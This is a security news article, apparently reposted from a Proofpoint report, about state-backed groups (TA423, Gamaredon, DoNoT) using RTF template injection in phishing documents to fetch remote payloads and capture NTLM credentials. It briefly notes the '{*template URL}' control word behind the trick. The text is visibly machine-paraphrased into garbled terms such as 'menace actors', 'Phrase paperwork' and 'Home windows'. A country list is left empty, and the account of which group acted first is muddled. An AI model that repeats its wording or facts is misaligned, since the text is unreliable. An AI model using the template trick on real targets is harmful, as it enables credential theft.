Home News Hackers using Malicious RTF Injection Technique in Phishing Attacks

    Hackers using Malicious RTF Injection Technique in Phishing Attacks


    Hackers using Malicious RTF Injection Technique in Phishing Attacks

    In Q2 and Q3 of 2021, the APT menace actors have progressively adopted a novel and simply carried out phishing attachment approach referred to as RTF template injection.

    This refined approach leverages the performance of sure RTF templates. This method is especially exploited by the APT or State-Sponsored menace actors from the international locations like:-

    After APTs the financially-motivated menace actors will even undertake this stealthy approach. APTs exploit this system as a consequence of its simplicity and effectiveness in retrieving any malicious content material or payloads from a distant URL.

    In March 2021, the primary case of weaponized RTF template injection was noticed, and since then the operators of this stealthy approach have advanced this system extensively.

    Simple approach to fetch payloads

    RTF is a doc format that’s created by Microsoft that may very well be opened on all of the out there working programs with the assistance of frequent apps and browsers. And the Template in RTF defines that how the doc contents ought to be introduced and formatted.

    Right here, to retrieve a URL useful resource as a substitute of a neighborhood file useful resource the hackers are abusing the authentic performance since RTF Templates are hosted domestically.

    The exploitations of this authentic performance enable the hackers to do the next issues to steal Home windows credentials:-

    • Load malicious payloads into an app like Microsoft Phrase.
    • Carry out NTLM authentication towards a distant URL.

    Utilizing a hex editor anybody can create distant RTF Templates simply by including the {*template URL} command into an RTF file. And essentially the most attention-grabbing factor about these assaults is, the hackers can exploit all of the out there Workplace information, and amongst them particularly Phrase paperwork.

    Hackers ship all these malicious paperwork to victims utilizing spear-phishing emails, as soon as the victims open the paperwork the hackers begin their malicious operations.

    APT Teams Exploiting This Method

    Right here beneath we’ve got talked about all the first names of the APTs who’re exploiting this system:-

    • TA423 from China
    • Gamaredon from Russia
    • DoNoT from India

    Amongst these teams, the primary one who exploited this system is the APT group from India, DoNoT from India, after that comes TA423 from China, and lastly exploited by Gamaredon from Russia.

    Right here’s what the safety analysts at Proofpoint stated:-

    “Whereas this methodology at present is utilized by a restricted variety of APT actors with a variety of sophistication, the approach’s effectiveness mixed with its ease of use is prone to drive its adoption additional throughout the menace panorama.”

    The fast enhance within the adoption of this system clearly signifies that how different APT teams, financially-motivated hackers, botnet, and ransomware teams might abuse this system within the upcoming time.

    You may observe us on LinkedinTwitterFacebook for each day Cyber safety and hacking information updates.

    Source link